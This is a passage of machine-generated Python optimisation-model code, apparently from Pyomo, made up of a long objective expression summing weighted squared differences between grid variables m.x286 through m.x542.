*m.x286 - 8.11690209768664*m.x313)**2 + (1.3*m.x312 - 1.3*m.x313)**2) + 4.33723936015931*((
8.11690209768664*m.x287 - 8.11690209768664*m.x314)**2 + (1.3*m.x313 - 1.3*m.x314)**2) +
4.33723936015931*((8.11690209768664*m.x288 - 8.11690209768664*m.x315)**2 + (1.3*m.x314 - 1.3*
m.x315)**2) + 4.33723936015931*((8.11690209768664*m.x289 - 8.11690209768664*m.x316)**2 + (1.3*
m.x315 - 1.3*m.x316)**2) + 4.33723936015931*((8.11690209768664*m.x290 - 8.11690209768664*m.x317)
**2 + (1.3*m.x316 - 1.3*m.x317)**2) + 4.33723936015931*((8.11690209768664*m.x291 -
8.11690209768664*m.x318)**2 + (1.3*m.x317 - 1.3*m.x318)**2) + 4.33723936015931*((8.11690209768664
*m.x292 - 8.11690209768664*m.x319)**2 + (1.3*m.x318 - 1.3*m.x319)**2) + 4.33723936015931*((
8.11690209768664*m.x293 - 8.11690209768664*m.x320)**2 + (1.3*m.x319 - 1.3*m.x320)**2) +
4.33723936015931*((8.11690209768664*m.x294 - 8.11690209768664*m.x321)**2 + (1.3*m.x320 - 1.3*
m.x321)**2) + 4.33723936015931*((8.11690209768664*m.x295 - 8.11690209768664*m.x322)**2 + (1.3*
m.x321 - 1.3*m.x322)**2) + 4.33723936015931*((8.11690209768664*m.x296 - 8.11690209768664*m.x323)
**2 + (1.3*m.x322 - 1.3*m.x323)**2) + 4.33723936015931*((8.11690209768664*m.x297 -
8.11690209768664*m.x324)**2 + (1.3*m.x323 - 1.3*m.x324)**2) + 4.18699886780755*((8.11690209768664
*m.x299 - 8.11690209768664*m.x326)**2 + (1.3*m.x325 - 1.3*m.x326)**2) + 4.18699886780755*((
8.11690209768664*m.x300 - 8.11690209768664*m.x327)**2 + (1.3*m.x326 - 1.3*m.x327)**2) +
4.18699886780755*((8.11690209768664*m.x301 - 8.11690209768664*m.x328)**2 + (1.3*m.x327 - 1.3*
m.x328)**2) + 4.18699886780755*((8.11690209768664*m.x302 - 8.11690209768664*m.x329)**2 + (1.3*
m.x328 - 1.3*m.x329)**2) + 4.18699886780755*((8.11690209768664*m.x303 - 8.11690209768664*m.x330)
**2 + (1.3*m.x329 - 1.3*m.x330)**2) + 4.18699886780755*((8.11690209768664*m.x304 -
8.11690209768664*m.x331)**2 + (1.3*m.x330 - 1.3*m.x331)**2) + 4.18699886780755*((8.11690209768664
*m.x305 - 8.11690209768664*m.x332)**2 + (1.3*m.x331 - 1.3*m.x332)**2) + 4.18699886780755*((
8.11690209768664*m.x306 - 8.11690209768664*m.x333)**2 + (1.3*m.x332 - 1.3*m.x333)**2) +
4.18699886780755*((8.11690209768664*m.x307 - 8.11690209768664*m.x334)**2 + (1.3*m.x333 - 1.3*
m.x334)**2) + 4.18699886780755*((8.11690209768664*m.x308 - 8.11690209768664*m.x335)**2 + (1.3*
m.x334 - 1.3*m.x335)**2) + 4.18699886780755*((8.11690209768664*m.x309 - 8.11690209768664*m.x336)
**2 + (1.3*m.x335 - 1.3*m.x336)**2) + 4.18699886780755*((8.11690209768664*m.x310 -
8.11690209768664*m.x337)**2 + (1.3*m.x336 - 1.3*m.x337)**2) + 4.18699886780755*((8.11690209768664
*m.x311 - 8.11690209768664*m.x338)**2 + (1.3*m.x337 - 1.3*m.x338)**2) + 4.18699886780755*((
8.11690209768664*m.x312 - 8.11690209768664*m.x339)**2 + (1.3*m.x338 - 1.3*m.x339)**2) +
4.18699886780755*((8.11690209768664*m.x313 - 8.11690209768664*m.x340)**2 + (1.3*m.x339 - 1.3*
m.x340)**2) + 4.18699886780755*((8.11690209768664*m.x314 - 8.11690209768664*m.x341)**2 + (1.3*
m.x340 - 1.3*m.x341)**2) + 4.18699886780755*((8.11690209768664*m.x315 - 8.11690209768664*m.x342)
**2 + (1.3*m.x341 - 1.3*m.x342)**2) + 4.18699886780755*((8.11690209768664*m.x316 -
8.11690209768664*m.x343)**2 + (1.3*m.x342 - 1.3*m.x343)**2) + 4.18699886780755*((8.11690209768664
*m.x317 - 8.11690209768664*m.x344)**2 + (1.3*m.x343 - 1.3*m.x344)**2) + 4.18699886780755*((
8.11690209768664*m.x318 - 8.11690209768664*m.x345)**2 + (1.3*m.x344 - 1.3*m.x345)**2) +
4.18699886780755*((8.11690209768664*m.x319 - 8.11690209768664*m.x346)**2 + (1.3*m.x345 - 1.3*
m.x346)**2) + 4.18699886780755*((8.11690209768664*m.x320 - 8.11690209768664*m.x347)**2 + (1.3*
m.x346 - 1.3*m.x347)**2) + 4.18699886780755*((8.11690209768664*m.x321 - 8.11690209768664*m.x348)
**2 + (1.3*m.x347 - 1.3*m.x348)**2) + 4.18699886780755*((8.11690209768664*m.x322 -
8.11690209768664*m.x349)**2 + (1.3*m.x348 - 1.3*m.x349)**2) + 4.18699886780755*((8.11690209768664
*m.x323 - 8.11690209768664*m.x350)**2 + (1.3*m.x349 - 1.3*m.x350)**2) + 4.18699886780755*((
8.11690209768664*m.x324 - 8.11690209768664*m.x351)**2 + (1.3*m.x350 - 1.3*m.x351)**2) +
4.0374532003277*((8.11690209768664*m.x326 - 8.11690209768664*m.x353)**2 + (1.3*m.x352 - 1.3*
m.x353)**2) + 4.0374532003277*((8.11690209768664*m.x327 - 8.11690209768664*m.x354)**2 + (1.3*
m.x353 - 1.3*m.x354)**2) + 4.0374532003277*((8.11690209768664*m.x328 - 8.11690209768664*m.x355)**
2 + (1.3*m.x354 - 1.3*m.x355)**2) + 4.0374532003277*((8.11690209768664*m.x329 - 8.11690209768664*
m.x356)**2 + (1.3*m.x355 - 1.3*m.x356)**2) + 4.0374532003277*((8.11690209768664*m.x330 -
8.11690209768664*m.x357)**2 + (1.3*m.x356 - 1.3*m.x357)**2) + 4.0374532003277*((8.11690209768664*
m.x331 - 8.11690209768664*m.x358)**2 + (1.3*m.x357 - 1.3*m.x358)**2) + 4.0374532003277*((
8.11690209768664*m.x332 - 8.11690209768664*m.x359)**2 + (1.3*m.x358 - 1.3*m.x359)**2) +
4.0374532003277*((8.11690209768664*m.x333 - 8.11690209768664*m.x360)**2 + (1.3*m.x359 - 1.3*
m.x360)**2) + 4.0374532003277*((8.11690209768664*m.x334 - 8.11690209768664*m.x361)**2 + (1.3*
m.x360 - 1.3*m.x361)**2) + 4.0374532003277*((8.11690209768664*m.x335 - 8.11690209768664*m.x362)**
2 + (1.3*m.x361 - 1.3*m.x362)**2) + 4.0374532003277*((8.11690209768664*m.x336 - 8.11690209768664*
m.x363)**2 + (1.3*m.x362 - 1.3*m.x363)**2) + 4.0374532003277*((8.11690209768664*m.x337 -
8.11690209768664*m.x364)**2 + (1.3*m.x363 - 1.3*m.x364)**2) + 4.0374532003277*((8.11690209768664*
m.x338 - 8.11690209768664*m.x365)**2 + (1.3*m.x364 - 1.3*m.x365)**2) + 4.0374532003277*((
8.11690209768664*m.x339 - 8.11690209768664*m.x366)**2 + (1.3*m.x365 - 1.3*m.x366)**2) +
4.0374532003277*((8.11690209768664*m.x340 - 8.11690209768664*m.x367)**2 + (1.3*m.x366 - 1.3*
m.x367)**2) + 4.0374532003277*((8.11690209768664*m.x341 - 8.11690209768664*m.x368)**2 + (1.3*
m.x367 - 1.3*m.x368)**2) + 4.0374532003277*((8.11690209768664*m.x342 - 8.11690209768664*m.x369)**
2 + (1.3*m.x368 - 1.3*m.x369)**2) + 4.0374532003277*((8.11690209768664*m.x343 - 8.11690209768664*
m.x370)**2 + (1.3*m.x369 - 1.3*m.x370)**2) + 4.0374532003277*((8.11690209768664*m.x344 -
8.11690209768664*m.x371)**2 + (1.3*m.x370 - 1.3*m.x371)**2) + 4.0374532003277*((8.11690209768664*
m.x345 - 8.11690209768664*m.x372)**2 + (1.3*m.x371 - 1.3*m.x372)**2) + 4.0374532003277*((
8.11690209768664*m.x346 - 8.11690209768664*m.x373)**2 + (1.3*m.x372 - 1.3*m.x373)**2) +
4.0374532003277*((8.11690209768664*m.x347 - 8.11690209768664*m.x374)**2 + (1.3*m.x373 - 1.3*
m.x374)**2) + 4.0374532003277*((8.11690209768664*m.x348 - 8.11690209768664*m.x375)**2 + (1.3*
m.x374 - 1.3*m.x375)**2) + 4.0374532003277*((8.11690209768664*m.x349 - 8.11690209768664*m.x376)**
2 + (1.3*m.x375 - 1.3*m.x376)**2) + 4.0374532003277*((8.11690209768664*m.x350 - 8.11690209768664*
m.x377)**2 + (1.3*m.x376 - 1.3*m.x377)**2) + 4.0374532003277*((8.11690209768664*m.x351 -
8.11690209768664*m.x378)**2 + (1.3*m.x377 - 1.3*m.x378)**2) + 3.89094933535162*((8.11690209768664
*m.x353 - 8.11690209768664*m.x380)**2 + (1.3*m.x379 - 1.3*m.x380)**2) + 3.89094933535162*((
8.11690209768664*m.x354 - 8.11690209768664*m.x381)**2 + (1.3*m.x380 - 1.3*m.x381)**2) +
3.89094933535162*((8.11690209768664*m.x355 - 8.11690209768664*m.x382)**2 + (1.3*m.x381 - 1.3*
m.x382)**2) + 3.89094933535162*((8.11690209768664*m.x356 - 8.11690209768664*m.x383)**2 + (1.3*
m.x382 - 1.3*m.x383)**2) + 3.89094933535162*((8.11690209768664*m.x357 - 8.11690209768664*m.x384)
**2 + (1.3*m.x383 - 1.3*m.x384)**2) + 3.89094933535162*((8.11690209768664*m.x358 -
8.11690209768664*m.x385)**2 + (1.3*m.x384 - 1.3*m.x385)**2) + 3.89094933535162*((8.11690209768664
*m.x359 - 8.11690209768664*m.x386)**2 + (1.3*m.x385 - 1.3*m.x386)**2) + 3.89094933535162*((
8.11690209768664*m.x360 - 8.11690209768664*m.x387)**2 + (1.3*m.x386 - 1.3*m.x387)**2) +
3.89094933535162*((8.11690209768664*m.x361 - 8.11690209768664*m.x388)**2 + (1.3*m.x387 - 1.3*
m.x388)**2) + 3.89094933535162*((8.11690209768664*m.x362 - 8.11690209768664*m.x389)**2 + (1.3*
m.x388 - 1.3*m.x389)**2) + 3.89094933535162*((8.11690209768664*m.x363 - 8.11690209768664*m.x390)
**2 + (1.3*m.x389 - 1.3*m.x390)**2) + 3.89094933535162*((8.11690209768664*m.x364 -
8.11690209768664*m.x391)**2 + (1.3*m.x390 - 1.3*m.x391)**2) + 3.89094933535162*((8.11690209768664
*m.x365 - 8.11690209768664*m.x392)**2 + (1.3*m.x391 - 1.3*m.x392)**2) + 3.89094933535162*((
8.11690209768664*m.x366 - 8.11690209768664*m.x393)**2 + (1.3*m.x392 - 1.3*m.x393)**2) +
3.89094933535162*((8.11690209768664*m.x367 - 8.11690209768664*m.x394)**2 + (1.3*m.x393 - 1.3*
m.x394)**2) + 3.89094933535162*((8.11690209768664*m.x368 - 8.11690209768664*m.x395)**2 + (1.3*
m.x394 - 1.3*m.x395)**2) + 3.89094933535162*((8.11690209768664*m.x369 - 8.11690209768664*m.x396)
**2 + (1.3*m.x395 - 1.3*m.x396)**2) + 3.89094933535162*((8.11690209768664*m.x370 -
8.11690209768664*m.x397)**2 + (1.3*m.x396 - 1.3*m.x397)**2) + 3.89094933535162*((8.11690209768664
*m.x371 - 8.11690209768664*m.x398)**2 + (1.3*m.x397 - 1.3*m.x398)**2) + 3.89094933535162*((
8.11690209768664*m.x372 - 8.11690209768664*m.x399)**2 + (1.3*m.x398 - 1.3*m.x399)**2) +
3.89094933535162*((8.11690209768664*m.x373 - 8.11690209768664*m.x400)**2 + (1.3*m.x399 - 1.3*
m.x400)**2) + 3.89094933535162*((8.11690209768664*m.x374 - 8.11690209768664*m.x401)**2 + (1.3*
m.x400 - 1.3*m.x401)**2) + 3.89094933535162*((8.11690209768664*m.x375 - 8.11690209768664*m.x402)
**2 + (1.3*m.x401 - 1.3*m.x402)**2) + 3.89094933535162*((8.11690209768664*m.x376 -
8.11690209768664*m.x403)**2 + (1.3*m.x402 - 1.3*m.x403)**2) + 3.89094933535162*((8.11690209768664
*m.x377 - 8.11690209768664*m.x404)**2 + (1.3*m.x403 - 1.3*m.x404)**2) + 3.89094933535162*((
8.11690209768664*m.x378 - 8.11690209768664*m.x405)**2 + (1.3*m.x404 - 1.3*m.x405)**2) +
3.7496242306139*((8.11690209768664*m.x380 - 8.11690209768664*m.x407)**2 + (1.3*m.x406 - 1.3*
m.x407)**2) + 3.7496242306139*((8.11690209768664*m.x381 - 8.11690209768664*m.x408)**2 + (1.3*
m.x407 - 1.3*m.x408)**2) + 3.7496242306139*((8.11690209768664*m.x382 - 8.11690209768664*m.x409)**
2 + (1.3*m.x408 - 1.3*m.x409)**2) + 3.7496242306139*((8.11690209768664*m.x383 - 8.11690209768664*
m.x410)**2 + (1.3*m.x409 - 1.3*m.x410)**2) + 3.7496242306139*((8.11690209768664*m.x384 -
8.11690209768664*m.x411)**2 + (1.3*m.x410 - 1.3*m.x411)**2) + 3.7496242306139*((8.11690209768664*
m.x385 - 8.11690209768664*m.x412)**2 + (1.3*m.x411 - 1.3*m.x412)**2) + 3.7496242306139*((
8.11690209768664*m.x386 - 8.11690209768664*m.x413)**2 + (1.3*m.x412 - 1.3*m.x413)**2) +
3.7496242306139*((8.11690209768664*m.x387 - 8.11690209768664*m.x414)**2 + (1.3*m.x413 - 1.3*
m.x414)**2) + 3.7496242306139*((8.11690209768664*m.x388 - 8.11690209768664*m.x415)**2 + (1.3*
m.x414 - 1.3*m.x415)**2) + 3.7496242306139*((8.11690209768664*m.x389 - 8.11690209768664*m.x416)**
2 + (1.3*m.x415 - 1.3*m.x416)**2) + 3.7496242306139*((8.11690209768664*m.x390 - 8.11690209768664*
m.x417)**2 + (1.3*m.x416 - 1.3*m.x417)**2) + 3.7496242306139*((8.11690209768664*m.x391 -
8.11690209768664*m.x418)**2 + (1.3*m.x417 - 1.3*m.x418)**2) + 3.7496242306139*((8.11690209768664*
m.x392 - 8.11690209768664*m.x419)**2 + (1.3*m.x418 - 1.3*m.x419)**2) + 3.7496242306139*((
8.11690209768664*m.x393 - 8.11690209768664*m.x420)**2 + (1.3*m.x419 - 1.3*m.x420)**2) +
3.7496242306139*((8.11690209768664*m.x394 - 8.11690209768664*m.x421)**2 + (1.3*m.x420 - 1.3*
m.x421)**2) + 3.7496242306139*((8.11690209768664*m.x395 - 8.11690209768664*m.x422)**2 + (1.3*
m.x421 - 1.3*m.x422)**2) + 3.7496242306139*((8.11690209768664*m.x396 - 8.11690209768664*m.x423)**
2 + (1.3*m.x422 - 1.3*m.x423)**2) + 3.7496242306139*((8.11690209768664*m.x397 - 8.11690209768664*
m.x424)**2 + (1.3*m.x423 - 1.3*m.x424)**2) + 3.7496242306139*((8.11690209768664*m.x398 -
8.11690209768664*m.x425)**2 + (1.3*m.x424 - 1.3*m.x425)**2) + 3.7496242306139*((8.11690209768664*
m.x399 - 8.11690209768664*m.x426)**2 + (1.3*m.x425 - 1.3*m.x426)**2) + 3.7496242306139*((
8.11690209768664*m.x400 - 8.11690209768664*m.x427)**2 + (1.3*m.x426 - 1.3*m.x427)**2) +
3.7496242306139*((8.11690209768664*m.x401 - 8.11690209768664*m.x428)**2 + (1.3*m.x427 - 1.3*
m.x428)**2) + 3.7496242306139*((8.11690209768664*m.x402 - 8.11690209768664*m.x429)**2 + (1.3*
m.x428 - 1.3*m.x429)**2) + 3.7496242306139*((8.11690209768664*m.x403 - 8.11690209768664*m.x430)**
2 + (1.3*m.x429 - 1.3*m.x430)**2) + 3.7496242306139*((8.11690209768664*m.x404 - 8.11690209768664*
m.x431)**2 + (1.3*m.x430 - 1.3*m.x431)**2) + 3.7496242306139*((8.11690209768664*m.x405 -
8.11690209768664*m.x432)**2 + (1.3*m.x431 - 1.3*m.x432)**2) + 3.61538071680863*((8.11690209768664
*m.x407 - 8.11690209768664*m.x434)**2 + (1.3*m.x433 - 1.3*m.x434)**2) + 3.61538071680863*((
8.11690209768664*m.x408 - 8.11690209768664*m.x435)**2 + (1.3*m.x434 - 1.3*m.x435)**2) +
3.61538071680863*((8.11690209768664*m.x409 - 8.11690209768664*m.x436)**2 + (1.3*m.x435 - 1.3*
m.x436)**2) + 3.61538071680863*((8.11690209768664*m.x410 - 8.11690209768664*m.x437)**2 + (1.3*
m.x436 - 1.3*m.x437)**2) + 3.61538071680863*((8.11690209768664*m.x411 - 8.11690209768664*m.x438)
**2 + (1.3*m.x437 - 1.3*m.x438)**2) + 3.61538071680863*((8.11690209768664*m.x412 -
8.11690209768664*m.x439)**2 + (1.3*m.x438 - 1.3*m.x439)**2) + 3.61538071680863*((8.11690209768664
*m.x413 - 8.11690209768664*m.x440)**2 + (1.3*m.x439 - 1.3*m.x440)**2) + 3.61538071680863*((
8.11690209768664*m.x414 - 8.11690209768664*m.x441)**2 + (1.3*m.x440 - 1.3*m.x441)**2) +
3.61538071680863*((8.11690209768664*m.x415 - 8.11690209768664*m.x442)**2 + (1.3*m.x441 - 1.3*
m.x442)**2) + 3.61538071680863*((8.11690209768664*m.x416 - 8.11690209768664*m.x443)**2 + (1.3*
m.x442 - 1.3*m.x443)**2) + 3.61538071680863*((8.11690209768664*m.x417 - 8.11690209768664*m.x444)
**2 + (1.3*m.x443 - 1.3*m.x444)**2) + 3.61538071680863*((8.11690209768664*m.x418 -
8.11690209768664*m.x445)**2 + (1.3*m.x444 - 1.3*m.x445)**2) + 3.61538071680863*((8.11690209768664
*m.x419 - 8.11690209768664*m.x446)**2 + (1.3*m.x445 - 1.3*m.x446)**2) + 3.61538071680863*((
8.11690209768664*m.x420 - 8.11690209768664*m.x447)**2 + (1.3*m.x446 - 1.3*m.x447)**2) +
3.61538071680863*((8.11690209768664*m.x421 - 8.11690209768664*m.x448)**2 + (1.3*m.x447 - 1.3*
m.x448)**2) + 3.61538071680863*((8.11690209768664*m.x422 - 8.11690209768664*m.x449)**2 + (1.3*
m.x448 - 1.3*m.x449)**2) + 3.61538071680863*((8.11690209768664*m.x423 - 8.11690209768664*m.x450)
**2 + (1.3*m.x449 - 1.3*m.x450)**2) + 3.61538071680863*((8.11690209768664*m.x424 -
8.11690209768664*m.x451)**2 + (1.3*m.x450 - 1.3*m.x451)**2) + 3.61538071680863*((8.11690209768664
*m.x425 - 8.11690209768664*m.x452)**2 + (1.3*m.x451 - 1.3*m.x452)**2) + 3.61538071680863*((
8.11690209768664*m.x426 - 8.11690209768664*m.x453)**2 + (1.3*m.x452 - 1.3*m.x453)**2) +
3.61538071680863*((8.11690209768664*m.x427 - 8.11690209768664*m.x454)**2 + (1.3*m.x453 - 1.3*
m.x454)**2) + 3.61538071680863*((8.11690209768664*m.x428 - 8.11690209768664*m.x455)**2 + (1.3*
m.x454 - 1.3*m.x455)**2) + 3.61538071680863*((8.11690209768664*m.x429 - 8.11690209768664*m.x456)
**2 + (1.3*m.x455 - 1.3*m.x456)**2) + 3.61538071680863*((8.11690209768664*m.x430 -
8.11690209768664*m.x457)**2 + (1.3*m.x456 - 1.3*m.x457)**2) + 3.61538071680863*((8.11690209768664
*m.x431 - 8.11690209768664*m.x458)**2 + (1.3*m.x457 - 1.3*m.x458)**2) + 3.61538071680863*((
8.11690209768664*m.x432 - 8.11690209768664*m.x459)**2 + (1.3*m.x458 - 1.3*m.x459)**2) +
3.48987601495026*((8.11690209768664*m.x434 - 8.11690209768664*m.x461)**2 + (1.3*m.x460 - 1.3*
m.x461)**2) + 3.48987601495026*((8.11690209768664*m.x435 - 8.11690209768664*m.x462)**2 + (1.3*
m.x461 - 1.3*m.x462)**2) + 3.48987601495026*((8.11690209768664*m.x436 - 8.11690209768664*m.x463)
**2 + (1.3*m.x462 - 1.3*m.x463)**2) + 3.48987601495026*((8.11690209768664*m.x437 -
8.11690209768664*m.x464)**2 + (1.3*m.x463 - 1.3*m.x464)**2) + 3.48987601495026*((8.11690209768664
*m.x438 - 8.11690209768664*m.x465)**2 + (1.3*m.x464 - 1.3*m.x465)**2) + 3.48987601495026*((
8.11690209768664*m.x439 - 8.11690209768664*m.x466)**2 + (1.3*m.x465 - 1.3*m.x466)**2) +
3.48987601495026*((8.11690209768664*m.x440 - 8.11690209768664*m.x467)**2 + (1.3*m.x466 - 1.3*
m.x467)**2) + 3.48987601495026*((8.11690209768664*m.x441 - 8.11690209768664*m.x468)**2 + (1.3*
m.x467 - 1.3*m.x468)**2) + 3.48987601495026*((8.11690209768664*m.x442 - 8.11690209768664*m.x469)
**2 + (1.3*m.x468 - 1.3*m.x469)**2) + 3.48987601495026*((8.11690209768664*m.x443 -
8.11690209768664*m.x470)**2 + (1.3*m.x469 - 1.3*m.x470)**2) + 3.48987601495026*((8.11690209768664
*m.x444 - 8.11690209768664*m.x471)**2 + (1.3*m.x470 - 1.3*m.x471)**2) + 3.48987601495026*((
8.11690209768664*m.x445 - 8.11690209768664*m.x472)**2 + (1.3*m.x471 - 1.3*m.x472)**2) +
3.48987601495026*((8.11690209768664*m.x446 - 8.11690209768664*m.x473)**2 + (1.3*m.x472 - 1.3*
m.x473)**2) + 3.48987601495026*((8.11690209768664*m.x447 - 8.11690209768664*m.x474)**2 + (1.3*
m.x473 - 1.3*m.x474)**2) + 3.48987601495026*((8.11690209768664*m.x448 - 8.11690209768664*m.x475)
**2 + (1.3*m.x474 - 1.3*m.x475)**2) + 3.48987601495026*((8.11690209768664*m.x449 -
8.11690209768664*m.x476)**2 + (1.3*m.x475 - 1.3*m.x476)**2) + 3.48987601495026*((8.11690209768664
*m.x450 - 8.11690209768664*m.x477)**2 + (1.3*m.x476 - 1.3*m.x477)**2) + 3.48987601495026*((
8.11690209768664*m.x451 - 8.11690209768664*m.x478)**2 + (1.3*m.x477 - 1.3*m.x478)**2) +
3.48987601495026*((8.11690209768664*m.x452 - 8.11690209768664*m.x479)**2 + (1.3*m.x478 - 1.3*
m.x479)**2) + 3.48987601495026*((8.11690209768664*m.x453 - 8.11690209768664*m.x480)**2 + (1.3*
m.x479 - 1.3*m.x480)**2) + 3.48987601495026*((8.11690209768664*m.x454 - 8.11690209768664*m.x481)
**2 + (1.3*m.x480 - 1.3*m.x481)**2) + 3.48987601495026*((8.11690209768664*m.x455 -
8.11690209768664*m.x482)**2 + (1.3*m.x481 - 1.3*m.x482)**2) + 3.48987601495026*((8.11690209768664
*m.x456 - 8.11690209768664*m.x483)**2 + (1.3*m.x482 - 1.3*m.x483)**2) + 3.48987601495026*((
8.11690209768664*m.x457 - 8.11690209768664*m.x484)**2 + (1.3*m.x483 - 1.3*m.x484)**2) +
3.48987601495026*((8.11690209768664*m.x458 - 8.11690209768664*m.x485)**2 + (1.3*m.x484 - 1.3*
m.x485)**2) + 3.48987601495026*((8.11690209768664*m.x459 - 8.11690209768664*m.x486)**2 + (1.3*
m.x485 - 1.3*m.x486)**2) + 3.37452161263041*((8.11690209768664*m.x461 - 8.11690209768664*m.x488)
**2 + (1.3*m.x487 - 1.3*m.x488)**2) + 3.37452161263041*((8.11690209768664*m.x462 -
8.11690209768664*m.x489)**2 + (1.3*m.x488 - 1.3*m.x489)**2) + 3.37452161263041*((8.11690209768664
*m.x463 - 8.11690209768664*m.x490)**2 + (1.3*m.x489 - 1.3*m.x490)**2) + 3.37452161263041*((
8.11690209768664*m.x464 - 8.11690209768664*m.x491)**2 + (1.3*m.x490 - 1.3*m.x491)**2) +
3.37452161263041*((8.11690209768664*m.x465 - 8.11690209768664*m.x492)**2 + (1.3*m.x491 - 1.3*
m.x492)**2) + 3.37452161263041*((8.11690209768664*m.x466 - 8.11690209768664*m.x493)**2 + (1.3*
m.x492 - 1.3*m.x493)**2) + 3.37452161263041*((8.11690209768664*m.x467 - 8.11690209768664*m.x494)
**2 + (1.3*m.x493 - 1.3*m.x494)**2) + 3.37452161263041*((8.11690209768664*m.x468 -
8.11690209768664*m.x495)**2 + (1.3*m.x494 - 1.3*m.x495)**2) + 3.37452161263041*((8.11690209768664
*m.x469 - 8.11690209768664*m.x496)**2 + (1.3*m.x495 - 1.3*m.x496)**2) + 3.37452161263041*((
8.11690209768664*m.x470 - 8.11690209768664*m.x497)**2 + (1.3*m.x496 - 1.3*m.x497)**2) +
3.37452161263041*((8.11690209768664*m.x471 - 8.11690209768664*m.x498)**2 + (1.3*m.x497 - 1.3*
m.x498)**2) + 3.37452161263041*((8.11690209768664*m.x472 - 8.11690209768664*m.x499)**2 + (1.3*
m.x498 - 1.3*m.x499)**2) + 3.37452161263041*((8.11690209768664*m.x473 - 8.11690209768664*m.x500)
**2 + (1.3*m.x499 - 1.3*m.x500)**2) + 3.37452161263041*((8.11690209768664*m.x474 -
8.11690209768664*m.x501)**2 + (1.3*m.x500 - 1.3*m.x501)**2) + 3.37452161263041*((8.11690209768664
*m.x475 - 8.11690209768664*m.x502)**2 + (1.3*m.x501 - 1.3*m.x502)**2) + 3.37452161263041*((
8.11690209768664*m.x476 - 8.11690209768664*m.x503)**2 + (1.3*m.x502 - 1.3*m.x503)**2) +
3.37452161263041*((8.11690209768664*m.x477 - 8.11690209768664*m.x504)**2 + (1.3*m.x503 - 1.3*
m.x504)**2) + 3.37452161263041*((8.11690209768664*m.x478 - 8.11690209768664*m.x505)**2 + (1.3*
m.x504 - 1.3*m.x505)**2) + 3.37452161263041*((8.11690209768664*m.x479 - 8.11690209768664*m.x506)
**2 + (1.3*m.x505 - 1.3*m.x506)**2) + 3.37452161263041*((8.11690209768664*m.x480 -
8.11690209768664*m.x507)**2 + (1.3*m.x506 - 1.3*m.x507)**2) + 3.37452161263041*((8.11690209768664
*m.x481 - 8.11690209768664*m.x508)**2 + (1.3*m.x507 - 1.3*m.x508)**2) + 3.37452161263041*((
8.11690209768664*m.x482 - 8.11690209768664*m.x509)**2 + (1.3*m.x508 - 1.3*m.x509)**2) +
3.37452161263041*((8.11690209768664*m.x483 - 8.11690209768664*m.x510)**2 + (1.3*m.x509 - 1.3*
m.x510)**2) + 3.37452161263041*((8.11690209768664*m.x484 - 8.11690209768664*m.x511)**2 + (1.3*
m.x510 - 1.3*m.x511)**2) + 3.37452161263041*((8.11690209768664*m.x485 - 8.11690209768664*m.x512)
**2 + (1.3*m.x511 - 1.3*m.x512)**2) + 3.37452161263041*((8.11690209768664*m.x486 -
8.11690209768664*m.x513)**2 + (1.3*m.x512 - 1.3*m.x513)**2) + 3.27049269683564*((8.11690209768664
*m.x488 - 8.11690209768664*m.x515)**2 + (1.3*m.x514 - 1.3*m.x515)**2) + 3.27049269683564*((
8.11690209768664*m.x489 - 8.11690209768664*m.x516)**2 + (1.3*m.x515 - 1.3*m.x516)**2) +
3.27049269683564*((8.11690209768664*m.x490 - 8.11690209768664*m.x517)**2 + (1.3*m.x516 - 1.3*
m.x517)**2) + 3.27049269683564*((8.11690209768664*m.x491 - 8.11690209768664*m.x518)**2 + (1.3*
m.x517 - 1.3*m.x518)**2) + 3.27049269683564*((8.11690209768664*m.x492 - 8.11690209768664*m.x519)
**2 + (1.3*m.x518 - 1.3*m.x519)**2) + 3.27049269683564*((8.11690209768664*m.x493 -
8.11690209768664*m.x520)**2 + (1.3*m.x519 - 1.3*m.x520)**2) + 3.27049269683564*((8.11690209768664
*m.x494 - 8.11690209768664*m.x521)**2 + (1.3*m.x520 - 1.3*m.x521)**2) + 3.27049269683564*((
8.11690209768664*m.x495 - 8.11690209768664*m.x522)**2 + (1.3*m.x521 - 1.3*m.x522)**2) +
3.27049269683564*((8.11690209768664*m.x496 - 8.11690209768664*m.x523)**2 + (1.3*m.x522 - 1.3*
m.x523)**2) + 3.27049269683564*((8.11690209768664*m.x497 - 8.11690209768664*m.x524)**2 + (1.3*
m.x523 - 1.3*m.x524)**2) + 3.27049269683564*((8.11690209768664*m.x498 - 8.11690209768664*m.x525)
**2 + (1.3*m.x524 - 1.3*m.x525)**2) + 3.27049269683564*((8.11690209768664*m.x499 -
8.11690209768664*m.x526)**2 + (1.3*m.x525 - 1.3*m.x526)**2) + 3.27049269683564*((8.11690209768664
*m.x500 - 8.11690209768664*m.x527)**2 + (1.3*m.x526 - 1.3*m.x527)**2) + 3.27049269683564*((
8.11690209768664*m.x501 - 8.11690209768664*m.x528)**2 + (1.3*m.x527 - 1.3*m.x528)**2) +
3.27049269683564*((8.11690209768664*m.x502 - 8.11690209768664*m.x529)**2 + (1.3*m.x528 - 1.3*
m.x529)**2) + 3.27049269683564*((8.11690209768664*m.x503 - 8.11690209768664*m.x530)**2 + (1.3*
m.x529 - 1.3*m.x530)**2) + 3.27049269683564*((8.11690209768664*m.x504 - 8.11690209768664*m.x531)
**2 + (1.3*m.x530 - 1.3*m.x531)**2) + 3.27049269683564*((8.11690209768664*m.x505 -
8.11690209768664*m.x532)**2 + (1.3*m.x531 - 1.3*m.x532)**2) + 3.27049269683564*((8.11690209768664
*m.x506 - 8.11690209768664*m.x533)**2 + (1.3*m.x532 - 1.3*m.x533)**2) + 3.27049269683564*((
8.11690209768664*m.x507 - 8.11690209768664*m.x534)**2 + (1.3*m.x533 - 1.3*m.x534)**2) +
3.27049269683564*((8.11690209768664*m.x508 - 8.11690209768664*m.x535)**2 + (1.3*m.x534 - 1.3*
m.x535)**2) + 3.27049269683564*((8.11690209768664*m.x509 - 8.11690209768664*m.x536)**2 + (1.3*
m.x535 - 1.3*m.x536)**2) + 3.27049269683564*((8.11690209768664*m.x510 - 8.11690209768664*m.x537)
**2 + (1.3*m.x536 - 1.3*m.x537)**2) + 3.27049269683564*((8.11690209768664*m.x511 -
8.11690209768664*m.x538)**2 + (1.3*m.x537 - 1.3*m.x538)**2) + 3.27049269683564*((8.11690209768664
*m.x512 - 8.11690209768664*m.x539)**2 + (1.3*m.x538 - 1.3*m.x539)**2) + 3.27049269683564*((
8.11690209768664*m.x513 - 8.11690209768664*m.x540)**2 + (1.3*m.x539 - 1.3*m.x540)**2) +
3.17874498030211*((8.11690209768664*m.x515 - 8.11690209768664*m.x542)**2 + (1.3*m.x541 - 1.3*
